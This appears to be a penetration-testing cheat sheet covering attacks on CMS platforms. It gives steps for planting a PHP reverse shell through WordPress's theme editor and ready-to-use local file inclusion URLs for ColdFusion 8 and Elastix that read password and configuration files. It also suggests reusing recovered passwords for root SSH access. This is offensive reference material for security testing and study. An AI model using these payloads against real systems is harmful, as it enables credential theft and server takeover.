CMS

  • Enumerate version and few other details

  • Google their vulnerability

Wordpress

admin page

/wp-admin
/wp-login

Configuration files

setup-config.php
wp-config.php

Enumerate users

/?author=1, /?author=2,

Uploading shell in WP_THEME

  1. Login into WP_dashboard and explore the appearance tab.

2. Now go in Themes section under Appearance and select Editor and there select twenty fifteen templet and get into 404.php

3. You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver.

4. Update the file and go to following url - http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php

5. you will have your session upon execution of 404.php file. :)

Drupal

Droopescan

Find version

/CHANGELOG.txt

Adobe Cold Fusion

Determine version

Version 8 Vulnerability

  • fckeditor

  • LFI

    http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Elastix

  • Google the vulnerabitlities

  • default login are admin:admin at /vtigercrm/

  • able to upload shell in profile-photo

2.2.0 - 'graph.php' Local File Inclusion

http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Note: Most probably this will be same password for root user too , so you can directly ssh through it

Joomla

  • Admin page - /administrator

  • Configuration files

Mambo

Config files

ZyXel

Configuration files

PreviousWeb ScanningNextDirectory Fuzzing

Last updated